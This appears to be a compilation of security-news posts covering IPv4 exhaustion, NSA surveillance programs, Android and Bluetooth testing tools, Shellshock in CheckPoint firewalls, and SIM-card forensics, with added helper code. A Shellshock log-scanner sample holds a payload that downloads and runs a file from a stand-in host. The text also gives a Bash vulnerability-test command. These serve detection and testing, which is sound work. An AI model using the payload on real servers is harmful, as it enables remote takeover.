It’s official: North America out of new IPv4 addresses

Remember how, a decade ago, we told you that the Internet was running out of IPv4 addresses? Well, it took a while, but that day is here now: Asia, Europe, and Latin America have been parceling out scraps for a year or more, and now the ARIN wait list is here for the US, Canada, and numerous North Atlantic and Caribbean islands. Only organizations in Africa can still get IPv4 addresses as needed. The good news is that IPv6 seems to be picking up the slack.

ARIN, the American Registry for Internet Numbers, has now activated its “IPv4 Unmet Requests Policy.” Until now, organizations in the ARIN region were able to get IPv4 addresses as needed, but yesterday, ARIN was no longer in a position to fulfill qualifying requests. As a result, ISPs that come to ARIN for IPv4 address space have three choices: they can take a smaller block (ARIN currently still has a limited supply of blocks of 512 and 256 addresses), they can go on the wait list in the hope that a block of the desired size will become available at some point in the future, or they can buy addresses, via a transfer, from an organization that has more than it needs.

“If you take a smaller block, you can’t come back for more address space for 90 days,” John Curran, CEO of ARIN, told Ars. “We currently have nearly 500 small blocks remaining, but we handle 300 to 400 requests per month, [so] those remaining small blocks are going to last between two and four weeks.”

Doesn’t this allow for strategic behavior, where each ISP tries to request a block slightly smaller than the requests already on the wait list? “The wait list is a last resort as very little address space is returned to ARIN,” Curran said. “Trying to figure out how to game the wait list is not strategic. Trying to figure out how to use IPv6 for new customers is strategic.”

“ISPs will have to get used to the transfer market. If you need IPv4 addresses, go there,” Curran continued. “But I’m not sure how long a market is going to be around. Seven billion people with smartphones and home connections, a connection at work, then add Google, YouTube, Facebook, Bing… Four billion addresses, even with a perfectly working market, isn’t going to work in the future.”

IPv4 address markets

We spoke to Janine Goodman, vice president of Avenue4, a broker of IPv4 addresses, about what to expect in the short term.

“IPv6 is going to happen, that’s the direction it’s going,” she said. “But it’s going to take a while. Organizations are not ready to turn to IPv6 tomorrow; this will take a few years. A transfer market allows for the transition from IPv4 to IPv6 in a responsible way, not a panicked way.”

“The price for blocks of IPv4 addresses of 65,536 addresses (a /16) or smaller is about $7 to $8 per address in the ARIN region. In other regions, which have fewer addresses out there, the price tends to be a little higher,” Goodman said. “We expect the IPv4 market to be around for at least three to five years. During that time, the price per address will likely go up and then finally come back down as IPv6 is being widely deployed.”

Goodman stressed that buyers of addresses should make sure they are “clean” and have a known history. There have been reports of address sales where the addresses turned out to be in ongoing use after completion of the transaction.

ARIN CEO Curran also suggested that buyers do their due diligence. “With a car, the car and the registration are two different things. Not so with IP addresses: the registration in the whois database is the only thing,” he said. However, ARIN will only modify its whois records if the buyer of the addresses has a documented need for the amount of address space in question. As such, prospective buyers can pre-qualify with ARIN and then go out and buy the address space that covers their documented needs for the next two years, or they can find a seller of address space first and then come to ARIN to make sure they qualify.

Bring on the IPv6!

The Internet Engineering Task Force (IETF) saw the eventual depletion of IP addresses looming in the early 1990s, so they set out to solve the problem and came up with a new version of the Internet Protocol. The old IP has version number 4; the new version is 6. IPv6 increases the length of IP addresses to no fewer than 128 bits—sort of like increasing phone numbers from 10 to 40 digits. As a result, the number of available IPv6 addresses is, for all practical purposes, unlimited.

The trouble is, of course, that old systems can only handle IPv4 with its 32-bit addresses. That problem has pretty much been solved in the intervening decade, and today virtually all operating systems can handle 128-bit IPv6 addresses—although some applications can’t or don’t handle them properly.

The main issue remaining is that most networks simply haven’t enabled IPv6 yet. Although turning on IPv6 is not as hard as some people think, it’s not entirely trivial either in larger networks. Internet Service Providers, routers, firewalls, load balancers, and DNS servers must all be IPv6-ready and be reconfigured. And then there are all those little (and not so little) homegrown applications that keep businesses running. In almost all cases, a new IPv6 numbering plan is required, and DHCP works differently with IPv6 than with IPv4.
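One concrete instance of the application-level problem mentioned above, added here as an example (it is not code from the article): the IPv4-era habit of splitting `host:port` on the last colon silently misparses IPv6 literals, and allow-lists that compare address strings miss the same client written in another spelling. The hardened version uses the bracketed form from RFC 3986 and compares addresses by value with Python’s `ipaddress` module. The addresses are constructed from the documentation prefixes 192.0.2.0/24 and 2001:db8::/32, and the function names are chosen here.

```python
import ipaddress
from typing import Iterable, Tuple, Union

Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]


def split_host_port_naive(s: str) -> Tuple[str, int]:
    """The IPv4-era idiom: split on the last ':'.

    Works for '192.0.2.1:443' but misparses a bare IPv6 literal such as
    '2001:db8::1' into host '2001:db8:' and port 1 without raising anything.
    """
    host, _, port = s.rpartition(":")
    return host, int(port)


def split_host_port(s: str) -> Tuple[str, int]:
    """Parse 'host:port' with IPv6 literals bracketed, e.g. '[2001:db8::1]:443'."""
    if s.startswith("["):
        end = s.find("]")
        if end < 0 or s[end + 1:end + 2] != ":":
            raise ValueError(f"malformed bracketed host:port {s!r}")
        return s[1:end], int(s[end + 2:])
    if s.count(":") != 1:
        # Either no port at all or an unbracketed IPv6 literal: refuse to guess.
        raise ValueError(f"ambiguous host:port {s!r}; bracket IPv6 literals")
    host, _, port = s.partition(":")
    return host, int(port)


def canonical(addr: str) -> Address:
    """Normalize an address literal so comparison is by value, not by string.

    - compressed and expanded IPv6 spellings become the same object
    - an IPv4-mapped IPv6 address (what a dual-stack socket reports for an
      IPv4 client, '::ffff:192.0.2.1') is folded back to the IPv4 address
    - a link-local zone id ('fe80::1%eth0') is dropped before parsing
    """
    addr = addr.split("%", 1)[0]
    ip = ipaddress.ip_address(addr)
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        return ip.ipv4_mapped
    return ip


def allowed(addr: str, allow_list: Iterable[str]) -> bool:
    """True if the canonicalized address falls inside any allow-listed network.

    'in' on an ipaddress network is False for the other IP version, so mixed
    v4/v6 allow-lists need no special casing.
    """
    ip = canonical(addr)
    return any(ip in ipaddress.ip_network(net, strict=False) for net in allow_list)


if __name__ == "__main__":
    print(split_host_port_naive("2001:db8::1"))          # ('2001:db8:', 1), silently wrong
    print(split_host_port("[2001:db8::1]:443"))          # ('2001:db8::1', 443)
    print(allowed("::ffff:192.0.2.7", ["192.0.2.0/24"]))  # True
```

The same by-value comparison matters for firewall and log tooling: a client that appears as `::ffff:192.0.2.7` on a dual-stack listener is the IPv4 client `192.0.2.7`, and an ACL that only knows the latter spelling will either block or, worse, bypass it depending on which side defaulted open.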

So for a long time, the number of Internet users who had IPv6 connectivity in addition to IPv4 connectivity, as well as the fraction of total Internet traffic that is IPv6, were rounding errors. Google’s statistics showed that only a few tenths of a percent of its users from 2009 to 2011 had IPv6 connectivity; that number reached one percent only at the end of 2012. A year ago, it hit 3.5 percent. Today, it stands between 6.5 (weekdays) and 7.5 percent (weekends).

Things get more interesting as we look at Google’s stats for individual countries. In early 2013, the US and Belgium weren’t notable players in the IPv6 adoption game, at 2.17 and 0.04 percent, respectively. Today, Belgium is the world leader at nearly 35 percent, and the US is third just behind Switzerland (both have about 21 percent adoption). According to Akamai’s numbers, seven countries now have IPv6 adoption rates above ten percent: Belgium, Switzerland, the US, Peru, Germany, Luxembourg, and Portugal—Greece will be the eighth very soon. Sixteen countries have more than five percent IPv6 deployment, and 32 countries have at least one percent.

Remarkably, neighboring countries may differ by an order of magnitude. The US is at nearly 21 percent, but Canada has only 0.5 percent IPv6 users. Belgium has nearly 35 percent, but the Netherlands has just three percent. Ireland is at 2.4 percent; the UK is at 0.2 percent.

Per-country IPv6 deployment

Don’t be too alarmed by the colors of Google’s IPv6 deployment map. White means no IPv6, while darker shades of green mean more IPv6. Red is bad, as it not only indicates very little IPv6 but also that IPv6 is slower than IPv4. Orange means that there is significant IPv6 deployment, but IPv6 connectivity is slower than IPv4 connectivity. However, IPv6 packets often take just two hundredths of a second longer than IPv4 packets, which isn’t ideal but not as alarming as the orange coloring suggests.

However, there are also places, such as Belgium or Russia, where on average IPv6 is actually faster than IPv4. One explanation for this could be that “good” ISPs also tend to be the ones that have IPv6 deployed. Routing paths over worse-performing ISPs that are available to IPv4 packets aren’t available to IPv6 packets, so those have no other choice than to flow through better performing ISPs. But in places where IPv6 deployment is lacking, there’s always the risk that the ISP providing the shortest path doesn’t run IPv6, so IPv6 packets need to follow a longer path, slowing down communication.

So it looks like a future where the Internet remains largely IPv4-only, with more and more invasive translation devices that let more and more users share a single IPv4 address, is not the most likely outcome. We now know that getting a tenth of a country’s Internet users on IPv6 within a year is doable. And as someone smart recently said about ISPs adopting IPv6, referring to Metcalfe’s Law, “If everyone is doing it, you have to do it, too.”

Skynet actually exists: Skynet is a top-secret program of the NSA

The National Security Agency (NSA) really does have a program named Skynet

Skynet was the malevolent military computer system that launches a war on the human race in the Terminator film franchise; it turns out that the NSA has a program with the same name.

According to The Intercept, the NSA does have a program called Skynet. Its aims are less lethal, but legally dubious: it is a surveillance program that uses phone metadata to record the call activity and location of suspected terrorists. An Al Jazeera journalist reportedly became one of its victims after he was placed on a terrorist watch list.

Ahmad Muaffaq Zaidan, bureau chief of Al Jazeera’s Islamabad office, was flagged by Skynet after US intelligence labelled him a possible Al Qaeda member and assigned him a watch-list number. Zaidan, a Syrian national, has conducted a number of exclusive interviews with senior Al Qaeda leaders, including Osama bin Laden himself.

According to a 2012 government presentation that The Intercept obtained from Edward Snowden, Skynet uses phone location and call metadata from bulk call records to identify suspicious patterns in suspects’ communication habits and physical movements.

Says Wired:

The presentation indicates that SKYNET looks for terrorist connections based on questions such as “who has traveled from Peshawar to Faisalabad or Lahore (and back) in the past month? Who does the traveler call when he arrives?” It also looks for suspicious behaviors such as someone who engages in “excessive SIM or handset swapping” or receives “incoming calls only.” The goal is to identify people who move around in a pattern similar to Al Qaeda couriers who are used to pass communication and intelligence between the group’s senior leaders.

In addition to its misleading name, SKYNET has a few problems though. It happened to misidentify an Al-Jazeera reporter as a member of al-Qaida based on the criteria mentioned above. (It seems that journalists meeting with sources and terrorists meeting with terrorist group leaders move in patterns that look the same to the computer.) This misidentification would be disturbing even if the government did not make use of such metadata to make life-and-death decisions about who to kill with drone strikes. However, it does.

The NSA, one should note, also has a second program that is very similar to the Terminator’s Skynet. As revealed by Edward Snowden in an interview with James Bamford for WIRED last year, it is called MonsterMind. Like the film version of Skynet, MonsterMind is a defensive surveillance system that would immediately and autonomously neutralize foreign cyberattacks against the US, and could be used to launch retaliatory strikes as well. Its algorithms would sift through massive repositories of metadata to distinguish normal network traffic from anomalous or malicious traffic. Armed with that knowledge, the NSA could immediately and autonomously identify, and block, a foreign threat.

Snowden also said that MonsterMind could one day be designed to automatically return fire, without human involvement, against an attacker. Because an attacker could alter malicious code to evade detection, a counterstrike would be more effective at neutralizing future attacks. That sounds a lot like Skynet. The NSA has not commented on why the iconic film name was given to its metadata program.

Credit: Kavita Iyer

AppUse – Android Pentest Platform Unified Standalone Environment

AppUse Virtual Machine, developed by AppSec Labs, is a unique (and free) platform for mobile application security testing in the Android environment, and it includes unique custom-made tools.

Faster & More Powerful
The system lets security teams perform security tests on Android applications easily. It was created as a virtual machine for penetration-testing teams who want a convenient, customized platform for Android application security testing, for finding security problems and analyzing application traffic.
To test an Android application, all you need to do is download the AppUse Virtual Machine, start it, load your application and test it.

Easy to Use
There is no need to install emulators or testing tools, and no need to install the proxy software’s SSL certificates; everything comes straight out of the box, pre-installed and configured for an ideal user experience.
Security experts who have seen the machine were very excited, calling it the next ‘BackTrack’ (a well-known distribution for security testing), specifically adapted for Android application security testing.

AppUse VM fills a gap in the security world: there is now a dedicated, customized testing environment for Android applications, something that has not been available until now, certainly not in the rich form offered by AppUse VM.
The machine is intended for the daily use of security testers working on Android applications everywhere, and is a must-have tool for any security practitioner.

We at AppSec Labs do not stand still; particularly at a time when so many cyber attacks take place, we consider it our duty to assist the public and enable quick and effective security testing.

As a part of AppSec Labs’ policy to promote application security in general, and specifically mobile application security, AppUse is offered as a free download on our website, in order to share the knowledge, experience and investment with the data security community.

Features
  • New Application Data section
  • Tree view of the application’s folder/file structure
  • Ability to pull files
  • Ability to view files
  • Ability to edit files
  • Ability to extract databases
  • Dynamic proxy managed via the Dashboard
  • New application-reversing features
  • Updated ReFrameworker tool
  • Dynamic indicator for Android device status
  • Bug and functionality fixes

Credit: kitploit

BlueMaho Project – Bluetooth Security Testing Suite

BlueMaho is a GUI shell (interface) for a suite of tools for Bluetooth security testing. It is free, open source, written in Python, and uses wxPython. It can be used to test Bluetooth devices for known vulnerabilities and, more importantly, to hunt for unknown ones. It can also produce useful statistics.

I got interested in Bluetooth for a while, and in the security implications of a personal area network protocol that includes discovery/broadcast etc. I ended up only posting one article at the time, though, which was about Haraldscan – BlueTooth Discovery Scanner.

I have a bunch more Bluetooth related resources to share though, so I’ll be putting them out from time to time. Some (like this) aren’t particularly up to date, but give you a great base to start with and play around.

Features

  • Scan for devices, show advanced info, SDP records, vendor etc.
  • Track devices – show where and how many times a device was seen, and its name changes
  • Loop scan – it can scan continuously, showing you the devices that are online
  • Alerts with sound if a new device is found
  • on_new_device – you can specify a command to run when a new device is found
  • It can use separate dongles – one for scanning (loop scan) and one for running tools or exploits
  • Send files
  • Change name, class, mode, BD_ADDR of local HCI devices
  • Save results in a database
  • Produce statistics (unique devices by day/hour, vendors, services etc.)
  • Test remote devices for known vulnerabilities (see exploits for more details)
  • Test remote devices for unknown vulnerabilities (see tools for more details)
  • Themes! You can customize it

Requirements

The main requirements are:

  • OS (tested with Debian 4.0 Etch / 2.6.18)
  • Python 2.4
  • wxPython
  • BlueZ

You can download BlueMaho here:

bluemaho_v090417.tgz

Or read more here.

Credit: darknet

CheckPoint’s Firewall systems at risk of Shellshock Bash attacks

Companies should check whether their CheckPoint systems have the widespread vulnerability

The Shellshock Bash bug was found in the admin panel (WebUI) of a typical CheckPoint system, raising the possibility that many more enterprise security systems could be vulnerable to attack.

The vulnerability exists in the CheckPoint firewall’s administrative WebUI, its DHCP component and other system modules, and affects all CheckPoint firewall versions on the Gaia, SecurePlatform, SecurePlatform 2.6, IPSO 6.2 and Gaia Embedded platforms and all appliance lines: 2012 models, Smart-1, Threat Emulation, UTM-1 and Power-1.

The bug, uncovered this week in a widely used component of Linux, Unix and Mac OS X, was found in the admin panel of CheckPoint, the largest firewall vendor. Alexey Baltacov, Network Security Architect at Frogteam|Security, said Sunday: “Because many vendors use similar servers, the vulnerability is likely widespread.”

Baltacov declined to expose the vulnerable path in the system but also said:

“I’m pretty sure that there are a bunch of them (vendors), if not a lot of them, that can also be exploitable.”

The CheckPoint OS platform and its admin panel, which typically run on Unix or Linux, are the main components of a CheckPoint firewall system for managing and configuring the organization’s firewall hardware.

Many CheckPoint Firewalls hardware and servers run GNU Bash, which is the component with the critical flaw.

Bash, which stands for Bourne Again Shell, is the default command shell of the operating system.
The bug lets an attacker trick Bash into executing arbitrary commands: vulnerable versions import shell function definitions from environment variables and keep executing whatever follows the function body. A CGI server copies request headers such as User-Agent into environment variables before it runs a script, so a crafted header sent to the Common Gateway Interface, an underlying component of the CheckPoint firewall’s administrative interface, becomes a command.
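To make that mechanism concrete, here is an added example (not from the article, CheckPoint or Frogteam|Security) that scans web server access logs for the `() {` function-definition prefix that Shellshock (CVE-2014-6271 and its follow-ups) probes place in request headers, and pulls out the command a vulnerable Bash would have run. The log lines are constructed in Apache combined format with documentation addresses, and the names `SHELLSHOCK_RE`, `scan_log` and `SAMPLE_LOG` are chosen here.

```python
import re
from typing import Dict, Iterable, List, Optional

# A bash function definition exported through the environment looks like
# '() { body }'.  Vulnerable bash keeps parsing after the closing brace, so the
# payload sits after '};'.  Capture that trailing command.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.+)")

# Apache "combined" format: client, identity, user, [time] "request" status
# bytes "referer" "user-agent".  Any of the three quoted fields reaches CGI
# scripts as an environment variable, so all three are inspected.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d+ \S+ '
    r'"(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def extract_shellshock_command(field: str) -> Optional[str]:
    """Return the command smuggled after a '() { ... };' prefix, or None."""
    m = SHELLSHOCK_RE.search(field)
    return m.group("cmd").strip() if m else None


def scan_log(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Return one hit per log line that carries a Shellshock-style payload."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("req", "ref", "ua"):
            cmd = extract_shellshock_command(m.group(field))
            if cmd:
                hits.append({"ip": m.group("ip"), "field": field, "cmd": cmd})
                break
    return hits


# Constructed sample log (not real traffic).  First and third lines carry
# payloads in the User-Agent and Referer respectively; the second is benign.
SAMPLE_LOG = [
    '198.51.100.7 - - [25/Sep/2014:10:01:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :; }; /bin/bash -c \'wget http://203.0.113.9/x -O /tmp/x; chmod +x /tmp/x; /tmp/x\'"',
    '192.0.2.44 - - [25/Sep/2014:10:01:05 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/admin.cgi HTTP/1.1" 500 0 '
    '"() { ignored; }; echo vulnerable" "curl/7.37"',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['ip']} via {hit['field']}: {hit['cmd']}")
```

To test a host directly rather than its logs, the canonical check is `env x='() { :;}; echo vulnerable' bash -c "echo test"`: a patched Bash prints only `test`. Legitimate JavaScript in a Referer can also contain `() {`, so treat hits as leads pointing at the CGI paths involved, not as proof of compromise.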

Eran Goldstein, Senior Cyber security and malware researcher at ZIMPERIUM said:

“Depending on the architecture of the firewall system, an attacker could manage and reconfigure all firewall hardware and servers and gain access to a company’s internal network. Even if you don’t have the username and password (for the firewall server’s admin panel), you can still exploit the vulnerability. Also, once inside the firewall system’s admin panel, a hacker could infect components inside the organization’s network and IT environment.”

Security researchers reported Thursday that hackers were trying to exploit Shellshock in Web servers. On Friday, firewall vendor Incapsula reported that in a 12-hour period, it recorded 725 attacks per hour against a total of 1,800 domains.

“This is pretty high for a single vulnerability,” Tim Matthews, vice president of marketing at Incapsula, said.

The attacks originated from 400 unique IP addresses. More than half of the attacks started from China and the U.S.

In general, the attackers were running automated scripts from compromised servers in existing botnets in an attempt to add more systems to the network. Several botnet operators were using re-purposed distributed denial of service (DDoS) bots in an attempt to exploit Shellshock.

CheckPoint responded on the company’s official website:

The OS WebUI may be susceptible to environment changes caused by the Shellshock exploit. At the time of Sep 2014, Check Point is not aware of any exploit on its solutions.

From CheckPoint website:

A Hotfix package is currently available for R75.40, R75.40VS, R75.45, R75.46, R75.47, R76, R77, R77.10, and R77.20.

This Hotfix package is relevant to the main appliances lines: 2012 models, Smart-1, Threat Emulation, UTM-1, Power-1. For other appliances, see the relevant section below.

For other versions – R65, R70.20, R71.20, R75.10, R75.20 and R75.30, use the Early Availability (EA) solution below. A General Availability (GA) solution will be published within the week of September 29th.

Credit: Frogteam|Security

SIM Card Forensics

The SIM (subscriber identity module) is a fundamental component of cellular phones. It is a kind of integrated circuit card (ICC), a microcontroller-based access module. Physically, the card is either a subscriber identity module (SIM) or a universal integrated circuit card (UICC). A SIM can be removed from one handset and inserted into another; it allows users to carry their identity, personal information, and service between devices, which is one reason all cell phones are expected to eventually incorporate some type of identity module. The ICC deployed for 2G networks is called a SIM; the UICC is the smart card for 3G networks, runs the universal subscriber identity module (USIM) application, and accepts universal mobile telecommunications service (UMTS) commands. USIMs are enhanced versions of present-day SIMs and carry backward-compatible information. A USIM has the distinctive feature of allowing one phone to have multiple numbers. If a SIM application and a USIM application are both present on the same UICC, they cannot be active simultaneously.

The first SIM cards were about the size of a credit card. As technology developed, cell phones began to shrink in size, and so did the SIM card: the mini-SIM is about one-third the size of a credit card, and today’s smartphones use the even smaller micro-SIM. These SIM cards vary in size, but all provide identification and authentication of the subscriber’s phone to its network, all contain storage for phone numbers, SMS, and other information, and all allow applications to be created on the card itself.

SIM Structure and File Systems

A SIM card contains a processor and an operating system with between 16 and 256 KB of persistent, electrically erasable, programmable read-only memory (EEPROM). It also contains RAM (random access memory) and ROM (read-only memory). RAM holds program execution state, while the ROM holds the operating system, user authentication, the data encryption algorithm, and other applications. The hierarchically organized file system of a SIM resides in persistent memory and stores data such as name and phone number entries, text messages, and network service settings. Depending on the phone used, some information on the SIM may coexist in the memory of the phone. Alternatively, information may reside entirely in the memory of the phone instead of in the available memory on the SIM.

The hierarchical file system resides in EEPROM. The file system consists of three types of files: master file (MF), dedicated files, and elementary files. The master file is the root of the file system. Dedicated files are the subordinate directories of master files. Elementary files contain various types of data, structured as either a sequence of data bytes, a sequence of fixed-size records, or a fixed set of fixed-size records used cyclically.

(Figure: hierarchical SIM file system showing the MF, DFs and EFs)

As can be seen in the figure above, dedicated files are subordinate directories under the MF, their contents and functions being defined by the GSM 11.11 standard. Three are usually present: DF(DCS1800), DF(GSM), and DF(Telecom). Also present directly under the MF are EFs such as EF(ICCID). Subordinate to each of the DFs are supporting EFs, which contain the actual data. The EFs under DF(DCS1800) and DF(GSM) contain network-related information, and the EFs under DF(Telecom) contain service-related information.

All the files have headers, but only EFs contain data. The first byte of every header identifies the file type and the header contains the information related to the structure of the files. The body of an EF contains information related to the application. Files can be either administrative- or application-specific and access to stored data is controlled by the operating system.

Security in SIM

SIM cards have built-in security features. The three file types, MF, DF, and EF, carry security attributes. These attributes are checked on every operation, and only properly authorized requests are allowed to reach the requested functionality. DF and EF files have different levels of access conditions:

  • Always (ALW)—Access to the file is allowed without any restriction.
  • Card holder verification 1 (CHV1)—Access is allowed after successful verification of the user’s PIN, or if PIN verification is disabled.
  • Card holder verification 2 (CHV2)—Access is allowed after successful verification of the user’s PIN2, or if PIN2 verification is disabled.
  • Administrative (ADM)—Only the card issuer that provides the SIM to the subscriber can access the file, after the prescribed requirements for administrative access are fulfilled.
  • Never (NEV)—Access to the file over the SIM/ME interface is forbidden.

The SIM operating system controls access to an element of the file system based on its access condition and the type of action being attempted. The operating system allows only a limited number of attempts, usually three, to enter the correct CHV before further attempts are blocked. Unblocking requires a PUK (PIN unblocking key), which resets the CHV and the attempt counter. If the subscriber is known, the unblock code for CHV1/CHV2 can readily be obtained from the service provider. The PUK has its own attempt limit, usually ten, after which the card is permanently blocked, so an examiner should never guess at it.

Sensitive Data in SIM

The SIM card contains sensitive information about the subscriber. Data such as contact lists and messages can be stored in SIM. SIM cards themselves contain a repository of data and information, some of which is listed below:

  • Integrated circuit card identifier (ICCID)
  • International mobile subscriber identity (IMSI)
  • Service provider name (SPN)
  • Mobile country code (MCC)
  • Mobile network code (MNC)
  • Mobile subscriber identification number (MSIN)
  • Mobile station international subscriber directory number (MSISDN)
  • Abbreviated dialing numbers (ADN)
  • Last dialed numbers (LDN)
  • Short message service (SMS)
  • Language preference (LP)
  • Card holder verification (CHV1 and CHV2)
  • Ciphering key (Kc)
  • Ciphering key sequence number
  • Emergency call code
  • Fixed dialing numbers (FDN)
  • Local area identity (LAI)
  • Own dialing number
  • Temporary mobile subscriber identity (TMSI)
  • Routing area identifier (RAI) network code
  • Service dialing numbers (SDNs)

These data have forensic value and are extracted from the EFs. We now discuss some of them.

A. Service Related Information

ICCID: The integrated circuit card identifier is a unique numeric identifier for the SIM that can be up to 20 digits long (ITU-T E.118). It consists of an industry identifier prefix (89 for telecommunications), followed by a country code, an issuer identifier number, an individual account identification number, and a Luhn check digit. One interpretation of the hypothetical twenty-digit ICCID 89 310 410 10 654378930 1 is shown below.

  • Issuer identification number (IIN), variable in length up to a maximum of seven digits:

The first two digits are fixed and make up the industry identifier; “89” refers to the telecommunications industry.

-The next one to three digits are the country code. This example reads “310” as the mobile country code (MCC) for the United States, but note that E.118 specifies the ITU-T E.164 telephone country code here (“1” for the US), not the E.212 MCC; real US-issued ICCIDs accordingly begin with 891 or 8901.

-The next one to four digits identify the issuer, normally the operator’s mobile network code (MNC) within that country. “410” refers to the operator AT&T Mobility.

-The next two digits, “10,” pertain to the home location register.

  • Individual account information, variable in length:

The next nine digits, “654378930,” represent the individual account identification number. Every number under one IIN has the same number of digits.

  • Check digit—the last digit, “1,” is computed from the preceding 19 digits using the Luhn algorithm. (Because this ICCID is hypothetical, its check digit does not actually satisfy Luhn; on a real card it will, and acquisition tools verify it to catch misread digits.)

IMSI: The international mobile subscriber identity is a unique 15-digit number provided to the subscriber. It has a similar structure to the ICCID and consists of the MCC, MNC, and MSIN. An example of interpreting a hypothetical 15-digit IMSI (302 720 123456789) is shown below:

  • MCC—The first three digits identify the country. “302″ refers to Canada.
  • MNC—The next two (European Standard) or three digits (North American Standard) identify the operator. “720″ refers to Rogers Communications.
  • MSIN—The next nine digits, “123456789,” identify the mobile unit within a carrier’s GSM network
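The ICCID and IMSI structures above are the kind of thing an acquisition tool checks before the digits go into a report. The following is an added example, not code from the article or from any of the tools named later, that strips the spacing a reader may print, validates the ICCID’s Luhn check digit, and splits an IMSI into MCC, MNC and MSIN. The `MNC_LENGTH` table is an assumed subset covering only the countries named in the text (a real tool carries the full ITU-T E.212 list), and the identifiers fed to it are the article’s hypothetical ones.

```python
import re
from dataclasses import dataclass
from typing import Dict

# Assumed subset of the ITU-T E.212 table: MCC -> MNC length.  North American
# MCCs (Canada 302, US 310/311/316) use 3-digit MNCs; anything not listed is
# treated as the 2-digit European form.  A real tool carries the complete list.
MNC_LENGTH: Dict[str, int] = {"302": 3, "310": 3, "311": 3, "316": 3}


def luhn_check_digit(payload: str) -> int:
    """Return the Luhn check digit for a string of decimal digits."""
    if not payload.isdigit():
        raise ValueError("payload must be decimal digits")
    total = 0
    for i, ch in enumerate(reversed(payload)):
        d = int(ch)
        if i % 2 == 0:          # rightmost payload digit is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def luhn_valid(number: str) -> bool:
    """True if the last digit is the correct Luhn check digit for the rest."""
    if len(number) < 2 or not number.isdigit():
        return False
    return luhn_check_digit(number[:-1]) == int(number[-1])


@dataclass
class Iccid:
    digits: str
    industry_id: str        # "89" for telecommunications
    issuer_and_account: str  # country code, issuer id and account number
    check_digit: str
    luhn_ok: bool


def parse_iccid(raw: str) -> Iccid:
    """Normalize an ICCID as printed by a reader (spaces allowed) and check it."""
    digits = re.sub(r"\D", "", raw)
    if len(digits) not in (19, 20):
        raise ValueError(f"ICCID has {len(digits)} digits; expected 19 or 20")
    if not digits.startswith("89"):
        raise ValueError("ICCID lacks the telecommunications industry prefix 89")
    return Iccid(digits, digits[:2], digits[2:-1], digits[-1], luhn_valid(digits))


@dataclass
class Imsi:
    mcc: str
    mnc: str
    msin: str


def parse_imsi(raw: str) -> Imsi:
    """Split a 15-digit IMSI into MCC, MNC and MSIN using MNC_LENGTH."""
    digits = re.sub(r"\D", "", raw)
    if len(digits) != 15:
        raise ValueError(f"IMSI has {len(digits)} digits; expected 15")
    mcc = digits[:3]
    n = MNC_LENGTH.get(mcc, 2)
    return Imsi(mcc, digits[3:3 + n], digits[3 + n:])


if __name__ == "__main__":
    print(parse_iccid("89 310 410 10 654378930 1"))   # luhn_ok=False: the example is hypothetical
    print(luhn_check_digit("8931041010654378930"))   # 5, the digit a real card would carry
    print(parse_imsi("302 720 123456789"))           # Imsi(mcc='302', mnc='720', msin='123456789')
```

A failed Luhn check on an ICCID read from a card is worth recording in the examination notes: it usually means a misread or mistyped digit rather than a bad card, and it is exactly the discrepancy a defense expert will ask about.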

MSISDN—The Mobile Station International Subscriber Directory Number is intended to convey the telephone number assigned to the subscriber for receiving calls on the phone. An example of the MSISDN format is shown below:

  • CC can be up to 3 digits.
  • NDC usually 2 or 3 digits.
  • SN can be up to a maximum 10 digits.

B. Phonebook and Call Information

1. Abbreviated dialing numbers (ADN)—The ADN EF holds the phonebook entries (names and numbers) stored by the subscriber, along with the type of number and numbering plan identification for each. It typically contains the subscriber’s commonly dialed contacts. ADN entries cannot be changed by the service provider, so they can be attributed to the user of the phone. Most SIMs provide 100 slots for ADN entries.

2. Fixed dialing numbers (FDN)—The FDN EF holds contact numbers and names like the ADN, but it serves a different purpose: when fixed dialing is enabled, the handset only allows calls to the numbers listed there. Updating the list requires PIN2 (CHV2).

3. Last number dialed (LND)—The LND EF contains the number most recently dialed by the subscriber. The number and name associated with that number is stored in this entry. Depending upon the phone, it is also conceivable that the information may be stored in the handset and not on the SIM. Any numbers that may be present can provide valuable information to an investigator.

(Figure: XML phonebook entry)

C. Messaging Information—Messaging is a communication medium by which text is entered on one cell phone and delivered via the mobile phone network. The short message service contains texts and associated parameters for the message. SMS entries contain other information besides the text itself, such as the time an incoming message was sent, as recorded by the mobile phone network, the sender’s phone number, the SMS center address, and the status of the entry. An SMS is limited to either 160 characters (Latin alphabet) or 70 characters (for other alphabets). Longer messages are broken down by the sending phone and reassembled by the receiving phone.

Tools for SIM Forensics

To perform a forensic examination of a SIM card, it has to be removed from the cell phone and connected to a SIM card reader. The original data on the SIM is preserved by blocking write requests to the SIM during analysis. A hash of the acquired data is then computed; the hash is used to check the integrity of the data, that is, whether it has changed or not. Many forensic tools are available, but not every tool can extract data from every type of cell phone and SIM card. Some well-known tools:

Encase Smartphone Examiner: This tool is specifically designed for gathering data from smartphones and tablets such as iPhone, iPad, etc. It can capture evidence from devices that use the Apple iOS, HP Palm OS, Windows Mobile OS, Google Android OS, or RIM Blackberry OS. It can acquire data from Blackberry and iTunes backup files as well as a multitude of SD cards. The evidence can be seamlessly integrated into EnCase Forensic.


MOBILedit! Forensic: This tool can analyze phones via Bluetooth, IrDA, or cable connection; it analyzes SIMs through SIM readers and can read deleted messages from the SIM card.


pySIM: A SIM card management tool capable of creating, editing, deleting, and performing backup and restore operations on the SIM phonebook and SMS records.


